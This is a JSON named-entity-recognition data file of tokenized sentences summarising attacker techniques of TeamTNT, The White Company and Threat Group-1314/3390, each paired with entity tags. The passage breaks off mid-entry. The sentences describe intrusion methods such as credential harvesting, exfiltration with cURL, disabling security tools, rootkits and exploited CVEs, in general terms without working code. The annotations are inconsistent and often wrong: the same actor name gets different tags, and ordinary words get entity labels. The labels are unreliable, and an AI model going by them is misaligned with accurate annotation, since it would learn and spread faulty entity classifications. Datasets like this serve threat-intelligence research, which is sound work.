{ - "tokens": [ - "TeamTNT", - "has", - "removed", - "system", - "logs", - "from", - "<code>/var/log/syslog</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "leveraged", - "AWS", - "CLI", - "to", - "enumerate", - "cloud", - "environments", - "with", - "compromised", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "queried", - "the", - "AWS", - "instance", - "metadata", - "service", - "for", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "executed", - "Hildegard", - "through", - "the", - "kubelet", - "API", - "run", - "command", - "and", - "by", - "executing", - "commands", - "on", - "running", - "containers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "checked", - "for", - "running", - "containers", - "with", - "<code>docker", - "ps</code>", - "and", - "for", - "specific", - "container", - "names", - "with", - "<code>docker", - "inspect</code>.", - "TeamTNT", - "has", - "also", - "searched", - "for", - "Kubernetes", - "pods", - "running", - "in", - "a", - "local", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "unsecured", - "AWS", - "credentials", - "and", - "Docker", - "API", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "a", - "script", - "that", - "decodes", - "a", - "Base64-encoded", - "version", - "of", - "WeaveWorks", - "Scope." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "deployed", - "different", - "types", - "of", - "containers", - "into", - "victim", - "environments", - "to", - "facilitate", - "execution.", - "TeamTNT", - "has", - "also", - "transferred", - "cryptocurrency", - "mining", - "software", - "to", - "Kubernetes", - "clusters", - "discovered", - "within", - "local", - "IP", - "address", - "ranges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "disabled", - "<code>iptables</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "disabled", - "and", - "uninstalled", - "security", - "tools", - "such", - "as", - "Alibaba,", - "Tencent,", - "and", - "BMC", - "cloud", - "monitoring", - "agents", - "on", - "cloud-based", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "obtained", - "domains", - "to", - "host", - "their", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "encrypted", - "its", - "binaries", - "via", - "AES", - "and", - "encoded", - "files", - "using", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "deployed", - "privileged", - "containers", - "that", - "mount", - "the", - "filesystem", - "of", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "sent", - "locally", - "staged", - "files", - "with", - "collected", - "credentials", - "to", - "C2", - "servers", - "using", - "cURL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "open-source", - "tools", - "such", - "as", - "Weave", - "Scope", - "to", - "target", - "exposed", - "Docker", - "API", - "ports", - "and", - "gain", - "initial", - "access", - "to", - "victim", - "environments.", - "TeamTNT", - "has", - "also", - "targeted", - "exposed", - "kubelets", - "for", - "Kubernetes", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "a", - "payload", - "that", - "removes", - "itself", - "after", - "running.", - "TeamTNT", - "also", - "has", - "deleted", - "locally", - "staged", - "files", - "for", - "collecting", - "credentials", - "or", - "scan", - "results", - "for", - "local", - "IP", - "addresses", - "after", - "exfiltrating", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "a", - "script", - "that", - "checks", - "`/proc/*/environ`", - "for", - "environment", - "variables", - "related", - "to", - "AWS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "the", - "<code>curl</code>", - "and", - "<code>wget</code>", - "commands", - "as", - "well", - "as", - "batch", - "scripts", - "to", - "download", - "new", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "modified", - "the", - "permissions", - "on", - "binaries", - "with", - "<code>chattr</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "created", - "local", - "privileged", - "users", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "aggregated", - "collected", - "credentials", - "in", - "text", - "files", - "before", - "exfiltrating." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "relied", - "on", - "users", - "to", - "download", - "and", - "execute", - "malicious", - "Docker", - "images." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "developed", - "custom", - "malware", - "such", - "as", - "Hildegard." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "disguised", - "their", - "scripts", - "with", - "docker-related", - "file", - "names." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "replaced", - ".dockerd", - "and", - ".dockerenv", - "with", - "their", - "own", - "scripts", - "and", - "cryptocurrency", - "mining", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "masscan", - "to", - "search", - "for", - "open", - "Docker", - "API", - "ports", - "and", - "Kubernetes", - "clusters.", - "TeamTNT", - "has", - "also", - "used", - "malware", - "that", - "utilizes", - "zmap", - "and", - "zgrab", - "to", - "search", - "for", - "vulnerable", - "services", - "in", - "cloud", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "attached", - "VGA", - "devices", - "using", - "lspci." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "executed", - "PowerShell", - "commands", - "in", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "unsecured", - "SSH", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "rival", - "malware", - "and", - "removes", - "it", - "if", - "found.", - "TeamTNT", - "has", - "also", - "searched", - "for", - "running", - "processes", - "containing", - "the", - "strings", - "aliyun", - "or", - "liyun", - "to", - "identify", - "machines", - "running", - "Alibaba", - "Cloud", - "Security", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "added", - "batch", - "scripts", - "to", - "the", - "startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "established", - "tmate", - "sessions", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "deployed", - "XMRig", - "Docker", - "images", - "to", - "mine", - "cryptocurrency.", - "TeamTNT", - "has", - "also", - "infected", - "Docker", - "containers", - "and", - "Kubernetes", - "clusters", - "with", - "XMRig,", - "and", - "used", - "RainbowMiner", - "and", - "lolMiner", - "for", - "mining", - "cryptocurrency." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Purp", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "rootkits", - "such", - "as", - "the", - "open-source", - "Diamorphine", - "rootkit", - "and", - "their", - "custom", - "bots", - "to", - "hide", - "cryptocurrency", - "mining", - "activities", - "on", - "the", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "SSH", - "to", - "connect", - "back", - "to", - "victim", - "machines.", - "TeamTNT", - "has", - "also", - "used", - "SSH", - "to", - "transfer", - "tools", - "and", - "payloads", - "onto", - "victim", - "hosts", - "and", - "execute", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "added", - "RSA", - "keys", - "in", - "<code>authorized_keys</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "scanned", - "specific", - "lists", - "of", - "target", - "IP", - "addresses." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "security", - "products", - "on", - "infected", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "UPX", - "and", - "Ezuri", - "packer", - "to", - "pack", - "its", - "binaries." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "system", - "version,", - "architecture,", - "disk", - "partition,", - "logical", - "volume,", - "and", - "hostname", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "enumerated", - "the", - "host", - "machine’s", - "IP", - "address." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "run", - "<code>netstat", - "-anp</code>", - "to", - "search", - "for", - "rival", - "malware", - "connections.", - "TeamTNT", - "has", - "also", - "used", - "`libprocesshider`", - "to", - "modify", - "<code>/etc/ld.so.preload</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "searched", - "for", - "services", - "such", - "as", - "Alibaba", - "Cloud", - "Security's", - "aliyun", - "service", - "and", - "BMC", - "Helix", - "Cloud", - "Security's", - "bmc-agent", - "service", - "in", - "order", - "to", - "disable", - "them." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "created", - "system", - "services", - "to", - "execute", - "cryptocurrency", - "mining", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "established", - "persistence", - "through", - "the", - "creation", - "of", - "a", - "cryptocurrency", - "mining", - "system", - "service", - "using", - "<code>systemctl</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "shell", - "scripts", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "uploaded", - "backdoored", - "Docker", - "images", - "to", - "Docker", - "Hub." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "scanned", - "for", - "vulnerabilities", - "in", - "IoT", - "devices", - "and", - "other", - "related", - "resources", - "such", - "as", - "the", - "Docker", - "API." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "the", - "`curl`", - "command", - "to", - "send", - "credentials", - "over", - "HTTP", - "and", - "the", - "`curl`", - "and", - "`wget`", - "commands", - "to", - "download", - "new", - "software.", - "TeamTNT", - "has", - "also", - "used", - "a", - "custom", - "user", - "agent", - "HTTP", - "header", - "in", - "shell", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "leveraged", - "iplogger.org", - "to", - "send", - "collected", - "data", - "back", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "batch", - "scripts", - "to", - "download", - "tools", - "and", - "executing", - "cryptocurrency", - "miners." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "TeamTNT", - "has", - "used", - "malware", - "that", - "adds", - "cryptocurrency", - "miners", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "taken", - "advantage", - "of", - "a", - "known", - "vulnerability", - "in", - "Microsoft", - "Word", - "(CVE", - "2012-0158)", - "to", - "execute", - "code." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "B-Features", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "the", - "ability", - "to", - "delete", - "its", - "malware", - "entirely", - "from", - "the", - "target", - "system." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "used", - "phishing", - "lure", - "documents", - "that", - "trick", - "users", - "into", - "opening", - "them", - "and", - "infecting", - "their", - "computers." - ], - "ner_tags": [ - "O", - "I-Org", - "I-Org", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "checked", - "for", - "specific", - "antivirus", - "products", - "on", - "the", - "target’s", - "computer,", - "including", - "Kaspersky,", - "Quick", - "Heal,", - "AVG,", - "BitDefender,", - "Avira,", - "Sophos,", - "Avast!,", - "and", - "ESET." - ], - "ner_tags": [ - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "obfuscated", - "their", - "payloads", - "through", - "packing." - ], - "ner_tags": [ - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "sent", - "phishing", - "emails", - "with", - "malicious", - "Microsoft", - "Word", - "attachments", - "to", - "victims." - ], - "ner_tags": [ - "O", - "I-Org", - "I-Org", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "White", - "Company", - "has", - "checked", - "the", - "current", - "date", - "on", - "the", - "victim", - "system." - ], - "ner_tags": [ - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-1314", - "actors", - "used", - "compromised", - "domain", - "credentials", - "for", - "the", - "victim's", - "endpoint", - "management", - "platform,", - "Altiris,", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-1314", - "actors", - "mapped", - "network", - "drives", - "using", - "<code>net", - "use</code>." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-1314", - "actors", - "used", - "a", - "victim's", - "endpoint", - "management", - "platform,", - "Altiris,", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-1314", - "actors", - "spawned", - "shells", - "on", - "remote", - "systems", - "on", - "a", - "victim", - "network", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "RAR", - "to", - "compress,", - "encrypt,", - "and", - "password-protect", - "files", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "use", - "at", - "to", - "schedule", - "tasks", - "to", - "run", - "self-extracting", - "RAR", - "archives,", - "which", - "install", - "HTTPBrowser", - "or", - "PlugX", - "on", - "other", - "victims", - "on", - "a", - "network." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "ran", - "a", - "command", - "to", - "compile", - "an", - "archive", - "of", - "file", - "types", - "of", - "interest", - "from", - "the", - "victim", - "user's", - "directories." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Threat", - "Group-3390", - "tool", - "can", - "use", - "a", - "public", - "UAC", - "bypass", - "method", - "to", - "elevate", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "obtained", - "stolen", - "valid", - "certificates,", - "including", - "from", - "VMProtect", - "and", - "the", - "Chinese", - "instant", - "messaging", - "application", - "Youdu,", - "for", - "their", - "operations." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "compromised", - "the", - "Able", - "Desktop", - "installer", - "to", - "gain", - "access", - "to", - "victim's", - "environments." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "performed", - "DLL", - "search", - "order", - "hijacking", - "to", - "execute", - "their", - "payload." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "DLL", - "side-loading,", - "including", - "by", - "using", - "legitimate", - "Kaspersky", - "antivirus", - "variants", - "as", - "well", - "as", - "`rc.exe`,", - "a", - "legitimate", - "Microsoft", - "Resource", - "Compiler." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "actors", - "have", - "split", - "RAR", - "files", - "for", - "exfiltration", - "into", - "parts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "ran", - "a", - "command", - "to", - "compile", - "an", - "archive", - "of", - "file", - "types", - "of", - "interest", - "from", - "the", - "victim", - "user's", - "directories." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "During", - "execution,", - "Threat", - "Group-3390", - "malware", - "deobfuscates", - "and", - "decompresses", - "code", - "that", - "was", - "encoded", - "with", - "Metasploit’s", - "shikata_ga_nai", - "encoder", - "as", - "well", - "as", - "compressed", - "with", - "LZNT1", - "compression." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "appcmd.exe", - "to", - "disable", - "logging", - "on", - "a", - "victim", - "server." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "registered", - "domains", - "for", - "C2." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "extensively", - "used", - "strategic", - "web", - "compromises", - "to", - "target", - "victims." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "embedded", - "malicious", - "code", - "into", - "websites", - "to", - "screen", - "a", - "potential", - "victim's", - "IP", - "address", - "and", - "then", - "exploit", - "their", - "browser", - "if", - "they", - "are", - "of", - "interest." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Threat", - "Group-3390", - "tool", - "can", - "encrypt", - "payloads", - "using", - "XOR.", - "Threat", - "Group-3390", - "malware", - "is", - "also", - "obfuscated", - "using", - "Metasploit’s", - "shikata_ga_nai", - "encoder", - "as", - "well", - "as", - "compressed", - "with", - "LZNT1", - "compression." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "exfiltrated", - "stolen", - "data", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "exploited", - "the", - "Microsoft", - "SharePoint", - "vulnerability", - "CVE-2019-0604", - "and", - "CVE-2021-26855,", - "CVE-2021-26857,", - "CVE-2021-26858,", - "and", - "CVE-2021-27065", - "in", - "Exchange", - "Server." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "I-Exp", - "O", - "B-Exp", - "B-Features", - "O", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "exploited", - "CVE-2018-0798", - "in", - "Equation", - "Editor." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Threat", - "Group-3390", - "has", - "used", - "CVE-2014-6324", - "and", - 